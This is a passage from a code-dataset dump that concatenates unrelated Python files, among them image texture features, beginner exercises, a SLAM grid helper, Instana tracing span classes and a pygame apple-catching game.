\n\n# def test(image_name):\n#     img = cv2.imread(image_name)\n#     try:\n#         img_shape = img.shape\n#     except:\n#         print('imread error')\n#         return\n#     # double slash means integer division\n#     img = cv2.resize(img, (img_shape[1]//2, img_shape[0]//2), interpolation=cv2.INTER_CUBIC)\n#     img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n#     glcm_0 = getGlcm(img_gray, 1, 0)\n#     glcm_1 = getGlcm(img_gray, 0, 1)\n#     glcm_2 = getGlcm(img_gray, 1, 1)\n#     glcm_3 = getGlcm(img_gray, -1, 1)\n#     asm0, con0, eng0, idm0 = feature_computer(glcm_0)\n#     asm1, con1, eng1, idm1 = feature_computer(glcm_1)\n#     asm2, con2, eng2, idm2 = feature_computer(glcm_2)\n#     asm3, con3, eng3, idm3 = feature_computer(glcm_3)\n#     return [asm0, con0, eng0, idm0, asm1, con1, eng1, idm1, asm2, con2, eng2, idm2, asm3, con3, eng3, idm3]\n\ndef glcminthis(img_gray):\n    glcm_0 = getGlcm(img_gray, 1, 0)\n    glcm_1 = getGlcm(img_gray, 0, 1)\n    glcm_2 = getGlcm(img_gray, 1, 1)\n    glcm_3 = getGlcm(img_gray, 1, 2)\n    asm0, con0, eng0, idm0 = feature_computer(glcm_0)\n    asm1, con1, eng1, idm1 = feature_computer(glcm_1)\n    asm2, con2, eng2, idm2 = feature_computer(glcm_2)\n    asm3, con3, eng3, idm3 = feature_computer(glcm_3)\n    # four features per offset, in offset order (the original list repeated\n    # idm1/idm2 and dropped idm0/idm3)\n    return [asm0, con0, eng0, idm0, asm1, con1, eng1, idm1, asm2, con2, eng2, idm2, asm3, con3, eng3, idm3]","sub_path":"glcm_extract.py","file_name":"glcm_extract.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"64468030","text":"#Script to write maths tables based on user input\n#gets two inputs, i. Table number ii. Table limit value\nprint(\"Maths Tables Generator\")\nsuccess = False\n\n#Table calculation logic\ndef table_logic(x,y):\n    for i in range(1,(y+1)):\n        print(f'{i} X {x} = {x * i}')\n\nwhile not success:\n    try:\n        table_number = int(input(\"Enter the table number : \"))\n        table_limit = int(input(\"Enter the end limit of the table : \"))\n        if (table_number >= 0) and (table_limit >= 0):\n            table_logic(table_number,table_limit)\n            print(\"Table ends!\")\n            success = True\n        else:\n            print(\"The input values should be a positive integer\")\n\n    except ValueError:\n        print(\"Expected only numerical values!\")\n","sub_path":"Tables.py","file_name":"Tables.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"247329263","text":"'''\n\n Online Python Compiler.\n Code, Compile, Run and Debug python program online.\nWrite your code in this editor and press \"Run\" button to execute it.\n\n'''\n\ndef is_goodNum(num):\n    str_num = str(num)\n    first = str_num[:2]\n    second = str_num[2:]\n    if int(second) > int(first):\n        return True\n    else:\n        return False\n\ndef total_(num):\n    total = 0\n    last_digit = num % 10\n    if num == 0:\n        return 0\n    else:\n        total += last_digit\n        return total + total_(num // 10)\n\ndef lucky_(num):\n    if num in lucky:\n        return \"lucky\"\n    elif num in very_lucky:\n        return \"very_lucky\"\n    else:\n        return\n\ndef is_fancy(num):\n    lst = list(str(num))\n    # fancy = at least one digit repeats; check every digit, not just the first\n    return any(lst.count(i) >= 2 for i in lst)\n\ndef fancy_num(lst):\n    count = 0\n    for i in lst:\n        #to check for fancy.\n        if is_fancy(i):\n            #to check for good number.\n            if is_goodNum(i):\n                summ = total_(i)\n                #to check for luck.\n                if lucky_(summ) is not None:\n                    count += 1\n                    print(i, '-', summ, end=\" \")\n                    print(lucky_(summ), \"|\", summ + 17, end=\" \")\n                    if summ + 17 in lucky:\n                        print(\"lucky\")\n                    elif summ + 17 in very_lucky:\n                        print(\"very lucky\")\n                    else:\n                        print(\"Not lucky\")\n\n    else:\n        print()\n        print(\"Choose any one from\", count)\n\nlucky = (1,3,5,6,9,10,14,15,16,18,21,24,27,32,33,36,42,46,50,51)\nvery_lucky = (19,23,37,41,45)\n\nnumber = [x for x in range(7000,8501)]\nfancy_num(number)\n","sub_path":"fancy checker.py","file_name":"fancy checker.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"27394859","text":"class Employee():\n    pay_rise = 0.05\n\n\n    def __init__(self, firstname, lastname, pay):\n        self.f = firstname\n        self.l = lastname\n        self.p = pay\n\n        print('this is a constructor')\n\n    def salary(self):\n        increase = self.p * self.pay_rise\n        salary = increase + self.p\n        return salary\n\n\n    def details(self):\n        return 'here is the product details'\n\ne1 = Employee('benedict', 'uwazie', 2000)\nprint(e1.salary())\n\nclass Developer(Employee):\n    def my_details(self):\n        return f'my firstname is {self.f} and lastname {self.l}'\nd1 = Developer('alabi', 'adebayor', 4000)\nprint(d1.my_details())\nprint(d1.salary())\n","sub_path":"day3/inheritance.py","file_name":"inheritance.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"337945807","text":"from robot_class import Robot\nfrom math import *\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\n\npath = os.getcwd()\n\ndef display_world(world_grid, position, landmarks=None):\n    \n    sns.set_style(\"dark\")\n    world_size = 
np.zeros((world_grid+1, world_grid+1))\n ax=plt.gca()\n cols = world_grid+1\n rows = world_grid+1\n \n ax.set_xticks([x for x in range(1,cols)], minor=True)\n ax.set_yticks([y for y in range(1,rows)], minor=True)\n \n plt.grid(which='minor', ls='-', lw=1, color='white')\n plt.grid(which='major', ls='-', lw=2, color='white')\n \n ax.text(position[0], position[1], 'o', ha='center',\n va='center', color='r', fontsize=30)\n \n if (landmarks is not None):\n for pos in landmarks:\n if (pos != position):\n ax.text(pos[0], pos[1], 'x', ha='center', va='center',\n color='purple', fontsize=20)\n \n plt.show()\n \n\ndef save_display_world(i,world_grid, position, landmarks=None, next_point=None):\n\n sns.set_style(\"dark\")\n world_size = np.zeros((world_grid+1, world_grid+1))\n ax = plt.gca()\n cols = world_grid+1\n rows = world_grid+1\n\n ax.set_xticks([x for x in range(1, cols)], minor=True)\n ax.set_yticks([y for y in range(1, rows)], minor=True)\n\n plt.grid(which='minor', ls='-', lw=1, color='white')\n plt.grid(which='major', ls='-', lw=2, color='white')\n\n ax.text(position[0], position[1], 'o', ha='center',\n va='center', color='r', fontsize=30)\n\n if (landmarks is not None):\n for pos in landmarks:\n if (pos != position):\n ax.text(pos[0], pos[1], 'x', ha='center', va='center',\n color='purple', fontsize=20)\n\n if next_point[0] != 0:\n plt.plot([position[0], next_point[0]], [\n position[1], next_point[1]], linewidth=3)\n plt.annotate(i, (position[0],position[1]), textcoords='offset points',\n xytext=(0,10), ha='center', fontsize=30)\n plt.tick_params(axis='both', labelsize=20)\n #plt.arrow(position[0], position[1], next_point[0]/2, next_point[1]/2)\n \n\n plt.savefig(path+\"/2d movement/world_\"+i+\".png\")\n\n return \"2d World is Covered\"\n\n\ndef make_data(N, num_landmarks, world_grid, measurement_range,\n motion_noise, measurement_noise, distance):\n\n complete = False\n while not complete:\n data = []\n R = Robot(world_grid, measurement_range, motion_noise, measurement_noise)\n R.make_landmarks(num_landmarks)\n seen = [False for row in range(num_landmarks)]\n \n orientation = random.random() * 2.0 * pi\n dx = cos(orientation) * distance\n dy = sin(orientation) * distance\n \n for k in range(N-1):\n Z = R.sense()\n for i in range(len(Z)):\n seen[Z[i][0]] = True\n while not R.move(dx, dy):\n orientation = random.random() * 2.0 * pi\n dx = cos(orientation) * distance\n dy = sin(orientation) * distance\n \n data.append([Z, [dx, dy]])\n \n complete = (sum(seen) == num_landmarks)\n print(' ')\n print('Landmarks: ', R.landmarks)\n print(R)\n \n return data\n \n \n","sub_path":"SLAM/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"527832960","text":"import six\nimport sys\nfrom .log import logger\nfrom .util import DictionaryOfStan\nfrom basictracer.span import BasicSpan\nimport opentracing.ext.tags as ot_tags\n\n\nclass SpanContext():\n def __init__(\n self,\n trace_id=None,\n span_id=None,\n baggage=None,\n sampled=True,\n level=1,\n synthetic=False):\n\n self.level = level\n self.trace_id = trace_id\n self.span_id = span_id\n self.sampled = sampled\n self.synthetic = synthetic\n self._baggage = baggage or {}\n\n @property\n def baggage(self):\n return self._baggage\n\n def with_baggage_item(self, key, value):\n new_baggage = self._baggage.copy()\n new_baggage[key] = value\n return SpanContext(\n trace_id=self.trace_id,\n span_id=self.span_id,\n 
sampled=self.sampled,\n baggage=new_baggage)\n\n\nclass InstanaSpan(BasicSpan):\n stack = None\n synthetic = False\n\n def finish(self, finish_time=None):\n super(InstanaSpan, self).finish(finish_time)\n\n def set_tag(self, key, value):\n # Key validation\n if not isinstance(key, six.text_type) and not isinstance(key, six.string_types) :\n logger.debug(\"(non-fatal) span.set_tag: tag names must be strings. tag discarded for %s\", type(key))\n return self\n\n final_value = value\n value_type = type(value)\n\n # Value validation\n if value_type in [bool, float, int, list, str]:\n return super(InstanaSpan, self).set_tag(key, final_value)\n\n elif isinstance(value, six.text_type):\n final_value = str(value)\n\n else:\n try:\n final_value = repr(value)\n except:\n final_value = \"(non-fatal) span.set_tag: values must be one of these types: bool, float, int, list, \" \\\n \"set, str or alternatively support 'repr'. tag discarded\"\n logger.debug(final_value, exc_info=True)\n return self\n\n return super(InstanaSpan, self).set_tag(key, final_value)\n\n def mark_as_errored(self, tags = None):\n \"\"\"\n Mark this span as errored.\n\n @param tags: optional tags to add to the span\n \"\"\"\n try:\n ec = self.tags.get('ec', 0)\n self.set_tag('ec', ec + 1)\n\n if tags is not None and type(tags) is dict:\n for key in tags:\n self.set_tag(key, tags[key])\n except Exception:\n logger.debug('span.mark_as_errored', exc_info=True)\n\n def assure_errored(self):\n \"\"\"\n Make sure that this span is marked as errored.\n @return: None\n \"\"\"\n try:\n ec = self.tags.get('ec', None)\n if ec is None or ec == 0:\n self.set_tag('ec', 1)\n except Exception:\n logger.debug('span.assure_errored', exc_info=True)\n\n def log_exception(self, e):\n \"\"\"\n Log an exception onto this span. 
This will log pertinent info from the exception and\n assure that this span is marked as errored.\n\n @param e: the exception to log\n \"\"\"\n try:\n message = \"\"\n self.mark_as_errored()\n\n if hasattr(e, '__str__') and len(str(e)) > 0:\n message = str(e)\n elif hasattr(e, 'message') and e.message is not None:\n message = e.message\n else:\n message = repr(e)\n\n if self.operation_name in ['rpc-server', 'rpc-client']:\n self.set_tag('rpc.error', message)\n elif self.operation_name == \"mysql\":\n self.set_tag('mysql.error', message)\n elif self.operation_name == \"postgres\":\n self.set_tag('pg.error', message)\n elif self.operation_name in RegisteredSpan.HTTP_SPANS:\n self.set_tag('http.error', message)\n elif self.operation_name in [\"celery-client\", \"celery-worker\"]:\n self.set_tag('error', message)\n else:\n self.log_kv({'message': message})\n except Exception:\n logger.debug(\"span.log_exception\", exc_info=True)\n raise\n\n def collect_logs(self):\n \"\"\"\n Collect up log data and feed it to the Instana brain.\n\n :param span: The span to search for logs in\n :return: Logs ready for consumption by the Instana brain.\n \"\"\"\n logs = {}\n for log in self.logs:\n ts = int(round(log.timestamp * 1000))\n if ts not in logs:\n logs[ts] = {}\n\n if 'message' in log.key_values:\n logs[ts]['message'] = log.key_values['message']\n if 'event' in log.key_values:\n logs[ts]['event'] = log.key_values['event']\n if 'parameters' in log.key_values:\n logs[ts]['parameters'] = log.key_values['parameters']\n\n return logs\n\n\nclass BaseSpan(object):\n sy = None\n \n def __str__(self):\n return \"BaseSpan(%s)\" % self.__dict__.__str__()\n\n def __repr__(self):\n return self.__dict__.__str__()\n\n def __init__(self, span, source, service_name, **kwargs):\n self.t = span.context.trace_id\n self.p = span.parent_id\n self.s = span.context.span_id\n self.ts = int(round(span.start_time * 1000))\n self.d = int(round(span.duration * 1000))\n self.f = source\n self.ec = span.tags.pop('ec', None)\n self.data = DictionaryOfStan()\n\n if span.synthetic:\n self.sy = True\n\n if span.stack:\n self.stack = span.stack\n\n self.__dict__.update(kwargs)\n\n\nclass SDKSpan(BaseSpan):\n ENTRY_KIND = [\"entry\", \"server\", \"consumer\"]\n EXIT_KIND = [\"exit\", \"client\", \"producer\"]\n\n def __init__(self, span, source, service_name, **kwargs):\n super(SDKSpan, self).__init__(span, source, service_name, **kwargs)\n\n span_kind = self.get_span_kind(span)\n\n self.n = \"sdk\"\n self.k = span_kind[1]\n\n if self.k == 1 and service_name is not None:\n self.data[\"service\"] = service_name\n\n self.data[\"sdk\"][\"name\"] = span.operation_name\n self.data[\"sdk\"][\"type\"] = span_kind[0]\n self.data[\"sdk\"][\"custom\"][\"tags\"] = span.tags\n self.data[\"sdk\"][\"custom\"][\"logs\"] = span.logs\n\n if \"arguments\" in span.tags:\n self.data.sdk.arguments = span.tags[\"arguments\"]\n\n if \"return\" in span.tags:\n self.data.sdk.Return = span.tags[\"return\"]\n\n if len(span.context.baggage) > 0:\n self.data[\"baggage\"] = span.context.baggage\n\n def get_span_kind(self, span):\n \"\"\"\n Will retrieve the `span.kind` tag and return a tuple containing the appropriate string and integer\n values for the Instana backend\n\n :param span: The span to search for the `span.kind` tag\n :return: Tuple (String, Int)\n \"\"\"\n kind = (\"intermediate\", 3)\n if \"span.kind\" in span.tags:\n if span.tags[\"span.kind\"] in self.ENTRY_KIND:\n kind = (\"entry\", 1)\n elif span.tags[\"span.kind\"] in self.EXIT_KIND:\n kind = 
(\"exit\", 2)\n return kind\n\n\nclass RegisteredSpan(BaseSpan):\n HTTP_SPANS = (\"aiohttp-client\", \"aiohttp-server\", \"django\", \"http\", \"soap\", \"tornado-client\",\n \"tornado-server\", \"urllib3\", \"wsgi\")\n\n EXIT_SPANS = (\"aiohttp-client\", \"cassandra\", \"celery-client\", \"couchbase\", \"log\", \"memcache\",\n \"mongo\", \"mysql\", \"postgres\", \"rabbitmq\", \"redis\", \"rpc-client\", \"sqlalchemy\",\n \"soap\", \"tornado-client\", \"urllib3\", \"pymongo\")\n\n ENTRY_SPANS = (\"aiohttp-server\", \"aws.lambda.entry\", \"celery-worker\", \"django\", \"wsgi\", \"rabbitmq\",\n \"rpc-server\", \"tornado-server\")\n\n LOCAL_SPANS = (\"render\")\n\n def __init__(self, span, source, service_name, **kwargs):\n super(RegisteredSpan, self).__init__(span, source, service_name, **kwargs)\n self.n = span.operation_name\n\n self.k = 1\n if span.operation_name in self.ENTRY_SPANS:\n # entry\n self._populate_entry_span_data(span)\n self.data[\"service\"] = service_name\n elif span.operation_name in self.EXIT_SPANS:\n self.k = 2 # exit\n self._populate_exit_span_data(span)\n elif span.operation_name in self.LOCAL_SPANS:\n self.k = 3 # intermediate span\n self._populate_local_span_data(span)\n\n if \"rabbitmq\" in self.data and self.data[\"rabbitmq\"][\"sort\"] == \"consume\":\n self.k = 1 # entry\n\n # Store any leftover tags in the custom section\n if len(span.tags):\n self.data[\"custom\"][\"tags\"] = span.tags\n\n def _populate_entry_span_data(self, span):\n if span.operation_name in self.HTTP_SPANS:\n self._collect_http_tags(span)\n\n elif span.operation_name == \"aws.lambda.entry\":\n self.data[\"lambda\"][\"arn\"] = span.tags.pop('lambda.arn', \"Unknown\")\n self.data[\"lambda\"][\"alias\"] = None\n self.data[\"lambda\"][\"runtime\"] = \"python\"\n self.data[\"lambda\"][\"functionName\"] = span.tags.pop('lambda.name', \"Unknown\")\n self.data[\"lambda\"][\"functionVersion\"] = span.tags.pop('lambda.version', \"Unknown\")\n self.data[\"lambda\"][\"trigger\"] = span.tags.pop('lambda.trigger', None)\n self.data[\"lambda\"][\"error\"] = None\n\n trigger_type = self.data[\"lambda\"][\"trigger\"]\n\n if trigger_type in [\"aws:api.gateway\", \"aws:application.load.balancer\"]:\n self._collect_http_tags(span)\n elif trigger_type == 'aws:cloudwatch.events':\n self.data[\"lambda\"][\"cw\"][\"events\"][\"id\"] = span.tags.pop('data.lambda.cw.events.id', None)\n self.data[\"lambda\"][\"cw\"][\"events\"][\"more\"] = span.tags.pop('lambda.cw.events.more', False)\n self.data[\"lambda\"][\"cw\"][\"events\"][\"resources\"] = span.tags.pop('lambda.cw.events.resources', None)\n\n elif trigger_type == 'aws:cloudwatch.logs':\n self.data[\"lambda\"][\"cw\"][\"logs\"][\"group\"] = span.tags.pop('lambda.cw.logs.group', None)\n self.data[\"lambda\"][\"cw\"][\"logs\"][\"stream\"] = span.tags.pop('lambda.cw.logs.stream', None)\n self.data[\"lambda\"][\"cw\"][\"logs\"][\"more\"] = span.tags.pop('lambda.cw.logs.more', None)\n self.data[\"lambda\"][\"cw\"][\"logs\"][\"events\"] = span.tags.pop('lambda.cw.logs.events', None)\n\n elif trigger_type == 'aws:s3':\n self.data[\"lambda\"][\"s3\"][\"events\"] = span.tags.pop('lambda.s3.events', None)\n elif trigger_type == 'aws:sqs':\n self.data[\"lambda\"][\"sqs\"][\"messages\"] = span.tags.pop('lambda.sqs.messages', None)\n\n elif span.operation_name == \"celery-worker\":\n self.data[\"celery\"][\"task\"] = span.tags.pop('task', None)\n self.data[\"celery\"][\"task_id\"] = span.tags.pop('task_id', None)\n self.data[\"celery\"][\"scheme\"] = span.tags.pop('scheme', 
None)\n self.data[\"celery\"][\"host\"] = span.tags.pop('host', None)\n self.data[\"celery\"][\"port\"] = span.tags.pop('port', None)\n self.data[\"celery\"][\"retry-reason\"] = span.tags.pop('retry-reason', None)\n self.data[\"celery\"][\"error\"] = span.tags.pop('error', None)\n\n elif span.operation_name == \"rabbitmq\":\n self.data[\"rabbitmq\"][\"exchange\"] = span.tags.pop('exchange', None)\n self.data[\"rabbitmq\"][\"queue\"] = span.tags.pop('queue', None)\n self.data[\"rabbitmq\"][\"sort\"] = span.tags.pop('sort', None)\n self.data[\"rabbitmq\"][\"address\"] = span.tags.pop('address', None)\n self.data[\"rabbitmq\"][\"key\"] = span.tags.pop('key', None)\n\n elif span.operation_name == \"rpc-server\":\n self.data[\"rpc\"][\"flavor\"] = span.tags.pop('rpc.flavor', None)\n self.data[\"rpc\"][\"host\"] = span.tags.pop('rpc.host', None)\n self.data[\"rpc\"][\"port\"] = span.tags.pop('rpc.port', None)\n self.data[\"rpc\"][\"call\"] = span.tags.pop('rpc.call', None)\n self.data[\"rpc\"][\"call_type\"] = span.tags.pop('rpc.call_type', None)\n self.data[\"rpc\"][\"params\"] = span.tags.pop('rpc.params', None)\n self.data[\"rpc\"][\"baggage\"] = span.tags.pop('rpc.baggage', None)\n self.data[\"rpc\"][\"error\"] = span.tags.pop('rpc.error', None)\n else:\n logger.debug(\"SpanRecorder: Unknown entry span: %s\" % span.operation_name)\n\n def _populate_local_span_data(self, span):\n if span.operation_name == \"render\":\n self.data[\"render\"][\"name\"] = span.tags.pop('name', None)\n self.data[\"render\"][\"type\"] = span.tags.pop('type', None)\n self.data[\"log\"][\"message\"] = span.tags.pop('message', None)\n self.data[\"log\"][\"parameters\"] = span.tags.pop('parameters', None)\n else:\n logger.debug(\"SpanRecorder: Unknown local span: %s\" % span.operation_name)\n\n def _populate_exit_span_data(self, span):\n if span.operation_name in self.HTTP_SPANS:\n self._collect_http_tags(span)\n\n elif span.operation_name == \"cassandra\":\n self.data[\"cassandra\"][\"cluster\"] = span.tags.pop('cassandra.cluster', None)\n self.data[\"cassandra\"][\"query\"] = span.tags.pop('cassandra.query', None)\n self.data[\"cassandra\"][\"keyspace\"] = span.tags.pop('cassandra.keyspace', None)\n self.data[\"cassandra\"][\"fetchSize\"] = span.tags.pop('cassandra.fetchSize', None)\n self.data[\"cassandra\"][\"achievedConsistency\"] = span.tags.pop('cassandra.achievedConsistency', None)\n self.data[\"cassandra\"][\"triedHosts\"] = span.tags.pop('cassandra.triedHosts', None)\n self.data[\"cassandra\"][\"fullyFetched\"] = span.tags.pop('cassandra.fullyFetched', None)\n self.data[\"cassandra\"][\"error\"] = span.tags.pop('cassandra.error', None)\n\n elif span.operation_name == \"celery-client\":\n self.data[\"celery\"][\"task\"] = span.tags.pop('task', None)\n self.data[\"celery\"][\"task_id\"] = span.tags.pop('task_id', None)\n self.data[\"celery\"][\"scheme\"] = span.tags.pop('scheme', None)\n self.data[\"celery\"][\"host\"] = span.tags.pop('host', None)\n self.data[\"celery\"][\"port\"] = span.tags.pop('port', None)\n self.data[\"celery\"][\"error\"] = span.tags.pop('error', None)\n\n elif span.operation_name == \"couchbase\":\n self.data[\"couchbase\"][\"hostname\"] = span.tags.pop('couchbase.hostname', None)\n self.data[\"couchbase\"][\"bucket\"] = span.tags.pop('couchbase.bucket', None)\n self.data[\"couchbase\"][\"type\"] = span.tags.pop('couchbase.type', None)\n self.data[\"couchbase\"][\"error\"] = span.tags.pop('couchbase.error', None)\n self.data[\"couchbase\"][\"error_type\"] = 
span.tags.pop('couchbase.error_type', None)\n self.data[\"couchbase\"][\"sql\"] = span.tags.pop('couchbase.sql', None)\n\n elif span.operation_name == \"rabbitmq\":\n self.data[\"rabbitmq\"][\"exchange\"] = span.tags.pop('exchange', None)\n self.data[\"rabbitmq\"][\"queue\"] = span.tags.pop('queue', None)\n self.data[\"rabbitmq\"][\"sort\"] = span.tags.pop('sort', None)\n self.data[\"rabbitmq\"][\"address\"] = span.tags.pop('address', None)\n self.data[\"rabbitmq\"][\"key\"] = span.tags.pop('key', None)\n\n elif span.operation_name == \"redis\":\n self.data[\"redis\"][\"connection\"] = span.tags.pop('connection', None)\n self.data[\"redis\"][\"driver\"] = span.tags.pop('driver', None)\n self.data[\"redis\"][\"command\"] = span.tags.pop('command', None)\n self.data[\"redis\"][\"error\"] = span.tags.pop('redis.error', None)\n self.data[\"redis\"][\"subCommands\"] = span.tags.pop('subCommands', None)\n\n elif span.operation_name == \"rpc-client\":\n self.data[\"rpc\"][\"flavor\"] = span.tags.pop('rpc.flavor', None)\n self.data[\"rpc\"][\"host\"] = span.tags.pop('rpc.host', None)\n self.data[\"rpc\"][\"port\"] = span.tags.pop('rpc.port', None)\n self.data[\"rpc\"][\"call\"] = span.tags.pop('rpc.call', None)\n self.data[\"rpc\"][\"call_type\"] = span.tags.pop('rpc.call_type', None)\n self.data[\"rpc\"][\"params\"] = span.tags.pop('rpc.params', None)\n self.data[\"rpc\"][\"baggage\"] = span.tags.pop('rpc.baggage', None)\n self.data[\"rpc\"][\"error\"] = span.tags.pop('rpc.error', None)\n\n elif span.operation_name == \"sqlalchemy\":\n self.data[\"sqlalchemy\"][\"sql\"] = span.tags.pop('sqlalchemy.sql', None)\n self.data[\"sqlalchemy\"][\"eng\"] = span.tags.pop('sqlalchemy.eng', None)\n self.data[\"sqlalchemy\"][\"url\"] = span.tags.pop('sqlalchemy.url', None)\n self.data[\"sqlalchemy\"][\"err\"] = span.tags.pop('sqlalchemy.err', None)\n\n elif span.operation_name == \"mysql\":\n self.data[\"mysql\"][\"host\"] = span.tags.pop('host', None)\n self.data[\"mysql\"][\"port\"] = span.tags.pop('port', None)\n self.data[\"mysql\"][\"db\"] = span.tags.pop(ot_tags.DATABASE_INSTANCE, None)\n self.data[\"mysql\"][\"user\"] = span.tags.pop(ot_tags.DATABASE_USER, None)\n self.data[\"mysql\"][\"stmt\"] = span.tags.pop(ot_tags.DATABASE_STATEMENT, None)\n self.data[\"mysql\"][\"error\"] = span.tags.pop('mysql.error', None)\n\n elif span.operation_name == \"postgres\":\n self.data[\"pg\"][\"host\"] = span.tags.pop('host', None)\n self.data[\"pg\"][\"port\"] = span.tags.pop('port', None)\n self.data[\"pg\"][\"db\"] = span.tags.pop(ot_tags.DATABASE_INSTANCE, None)\n self.data[\"pg\"][\"user\"] = span.tags.pop(ot_tags.DATABASE_USER, None)\n self.data[\"pg\"][\"stmt\"] = span.tags.pop(ot_tags.DATABASE_STATEMENT, None)\n self.data[\"pg\"][\"error\"] = span.tags.pop('pg.error', None)\n\n elif span.operation_name == \"mongo\":\n service = \"%s:%s\" % (span.tags.pop('host', None), span.tags.pop('port', None))\n namespace = \"%s.%s\" % (span.tags.pop('db', \"?\"), span.tags.pop('collection', \"?\"))\n\n self.data[\"mongo\"][\"service\"] = service\n self.data[\"mongo\"][\"namespace\"] = namespace\n self.data[\"mongo\"][\"command\"] = span.tags.pop('command', None)\n self.data[\"mongo\"][\"filter\"] = span.tags.pop('filter', None)\n self.data[\"mongo\"][\"json\"] = span.tags.pop('json', None)\n self.data[\"mongo\"][\"error\"] = span.tags.pop('error', None)\n\n elif span.operation_name == \"log\":\n # use last special key values\n for l in span.logs:\n if \"message\" in l.key_values:\n self.data[\"log\"][\"message\"] = 
l.key_values.pop(\"message\", None)\n                if \"parameters\" in l.key_values:\n                    self.data[\"log\"][\"parameters\"] = l.key_values.pop(\"parameters\", None)\n        else:\n            logger.debug(\"SpanRecorder: Unknown exit span: %s\" % span.operation_name)\n\n    def _collect_http_tags(self, span):\n        self.data[\"http\"][\"host\"] = span.tags.pop(\"http.host\", None)\n        self.data[\"http\"][\"url\"] = span.tags.pop(ot_tags.HTTP_URL, None)\n        self.data[\"http\"][\"path\"] = span.tags.pop(\"http.path\", None)\n        self.data[\"http\"][\"params\"] = span.tags.pop('http.params', None)\n        self.data[\"http\"][\"method\"] = span.tags.pop(ot_tags.HTTP_METHOD, None)\n        self.data[\"http\"][\"status\"] = span.tags.pop(ot_tags.HTTP_STATUS_CODE, None)\n        self.data[\"http\"][\"path_tpl\"] = span.tags.pop(\"http.path_tpl\", None)\n        self.data[\"http\"][\"error\"] = span.tags.pop('http.error', None)\n\n        if span.operation_name == \"soap\":\n            self.data[\"soap\"][\"action\"] = span.tags.pop('soap.action', None)\n","sub_path":"instana/span.py","file_name":"span.py","file_ext":"py","file_size_in_byte":19874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"355838279","text":"import pygame\nfrom pygame.locals import K_ESCAPE, KEYDOWN, RLEACCEL\n\nimport config\nfrom sprites import Apple, Basket\n\n\n# Setup for sounds. Defaults are good.\npygame.mixer.init()\n\n# Initialize pygame\npygame.init()\n\n# Set up the drawing window\nscreen = pygame.display.set_mode((config.SCREEN_WIDTH, config.SCREEN_HEIGHT))\n\n# Setup the clock for a decent framerate\nclock = pygame.time.Clock()\n\n# Timer\ncounter, counter_text = 60, '60'.rjust(3)\nCOUNTDOWN = pygame.USEREVENT + 1\npygame.time.set_timer(COUNTDOWN, 1000)\n\n# Create a custom event for adding a new enemy\nADDAPPLE = pygame.USEREVENT + 2  # must be distinct from COUNTDOWN\npygame.time.set_timer(ADDAPPLE, 1000)\n\n# Instantiate the sprites\nbasket = Basket()\n\n# Sprite groups\napples = pygame.sprite.Group()\nall_sprites = pygame.sprite.Group()\nall_sprites.add(basket)\n\n# Sounds\nyeah_sound = pygame.mixer.Sound(\"yeah.ogg\")\n\n# Run until the user asks to quit\nrunning = True\nwhile running:\n\n    # Font init\n    pygame.font.init()\n    myfont = pygame.font.SysFont('Consolas', 30)\n\n    # Look at every event in the queue\n    for event in pygame.event.get():\n        # Did the user hit a key?\n        if event.type == KEYDOWN:\n            # Was it the Escape key? 
If so, stop the loop.\n if event.key == K_ESCAPE:\n running = False\n if event.type == pygame.QUIT:\n running = False\n\n # Add a new enemy?\n if event.type == ADDAPPLE:\n # Create the new enemy and add it to sprite groups\n new_apple = Apple()\n apples.add(new_apple)\n all_sprites.add(new_apple)\n\n # Timer event\n if event.type == COUNTDOWN:\n counter -= 1\n if counter > 0:\n counter_text = str(counter).rjust(3)\n else:\n running = False\n\n # Get the set of keys pressed and check for user input\n pressed_keys = pygame.key.get_pressed()\n\n # Update the player sprite based on user keypresses\n basket.update(pressed_keys)\n\n # Update enemy position\n apples.update()\n\n # Fill the background with white\n screen.fill(config.BACKGROUND_COLOR)\n\n # Draw all sprites\n for entity in all_sprites:\n screen.blit(entity.surf, entity.rect)\n\n # Check if any apples have collided with the basket\n apple_in_basket = pygame.sprite.spritecollideany(basket, apples)\n if apple_in_basket:\n # If so, then remove the player and stop the loop\n config.APPLES_IN_BASKET += 1\n yeah_sound.play()\n apple_in_basket.kill()\n\n # Show the amount of apples in the basket and the fallen ones\n apple_basket_counter = myfont.render(str(config.APPLES_IN_BASKET), False, (0, 128, 0))\n apple_floor_counter = myfont.render(str(config.APPLES_ON_FLOOR), False, (255, 0, 0))\n screen.blit(apple_basket_counter, (config.SCREEN_WIDTH - 40, 10))\n screen.blit(apple_floor_counter, (10, 10))\n # Show the time\n screen.blit(myfont.render(counter_text, True, (255, 255, 255)), (config.SCREEN_WIDTH / 2, 10))\n\n # Flip everything into the display\n pygame.display.flip()\n\n # Ensure program maintains a rate of 30 frames per second\n clock.tick(30)\n\n# Done! Time to quit.\nprint(\"You caught {} apples\".format(config.APPLES_IN_BASKET))\nprint(\"You dropped {} apples\".format(config.APPLES_ON_FLOOR))\npygame.quit()\n","sub_path":"meetup11/apples/apples.py","file_name":"apples.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"122545757","text":"#!/usr/bin/env python\n\n# Copyright (C) 2014 Hiroki Horiuchi \n#\n# [GNU all-permissive license]\n# Copying and distribution of this file, with or without modification,\n# are permitted in any medium without royalty provided the copyright\n# notice and this notice are preserved.\n# This file is offered as-is, without any warranty.\n\nfrom framework import one_shot\n\nfrom sys import argv\n\ndef g(conf):\n y = ''\n for key in 'default', 'timeout':\n value = conf.get(key)\n if value == None:\n continue\n y += 'set {}={}\\n'.format(key, value)\n if not y:\n return\n yield y\n\nif __name__ == '__main__':\n 